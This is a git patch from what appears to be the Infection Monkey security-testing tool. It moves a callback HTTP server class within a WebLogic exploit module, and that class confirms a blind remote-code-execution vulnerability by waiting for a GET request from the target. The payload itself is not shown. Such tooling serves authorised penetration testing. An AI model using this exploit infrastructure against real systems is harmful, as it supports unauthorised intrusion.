Vakaris Date: Wed, 29 Aug 2018 16:55:03 +0300 Subject: [PATCH 10/10] Custom http server class moved to the end of file --- infection_monkey/exploit/weblogic.py | 68 ++++++++++++++-------------- 1 file changed, 34 insertions(+), 34 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index 68ea9f5f2..24e99424c 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -66,40 +66,6 @@ class WebLogicExploiter(WebRCE): print(e) return True - class IndicationHTTPServer(threading.Thread): - """ - Http server built to wait for GET requests. Because oracle web logic vuln is blind, - we determine if we can exploit by either getting a GET request from host or not. - """ - def __init__(self, local_ip, local_port, lock, max_requests=1): - self._local_ip = local_ip - self._local_port = local_port - self.get_requests = 0 - self.max_requests = max_requests - self._stopped = False - self.lock = lock - threading.Thread.__init__(self) - self.daemon = True - - def run(self): - class S(BaseHTTPRequestHandler): - @staticmethod - def do_GET(): - LOG.info('Server received a request from vulnerable machine') - self.get_requests += 1 - LOG.info('Server waiting for exploited machine request...') - httpd = HTTPServer((self._local_ip, self._local_port), S) - httpd.daemon = True - self.lock.release() - while not self._stopped and self.get_requests < self.max_requests: - httpd.handle_request() - - self._stopped = True - return httpd - - def stop(self): - self._stopped = True - def check_if_exploitable(self, url): # Server might get response faster than it starts listening to it, we need a lock httpd, lock = self._start_http_server() @@ -195,3 +161,37 @@ class WebLogicExploiter(WebRCE): ''' payload = generic_check_payload.format(host=ip, port=port) return payload + + class IndicationHTTPServer(threading.Thread): + """ + Http server built to wait for GET requests. Because oracle web logic vuln is blind, + we determine if we can exploit by either getting a GET request from host or not. + """ + def __init__(self, local_ip, local_port, lock, max_requests=1): + self._local_ip = local_ip + self._local_port = local_port + self.get_requests = 0 + self.max_requests = max_requests + self._stopped = False + self.lock = lock + threading.Thread.__init__(self) + self.daemon = True + + def run(self): + class S(BaseHTTPRequestHandler): + @staticmethod + def do_GET(): + LOG.info('Server received a request from vulnerable machine') + self.get_requests += 1 + LOG.info('Server waiting for exploited machine request...') + httpd = HTTPServer((self._local_ip, self._local_port), S) + httpd.daemon = True + self.lock.release() + while not self._stopped and self.get_requests < self.max_requests: + httpd.handle_request() + + self._stopped = True + return httpd + + def stop(self): + self._stopped = True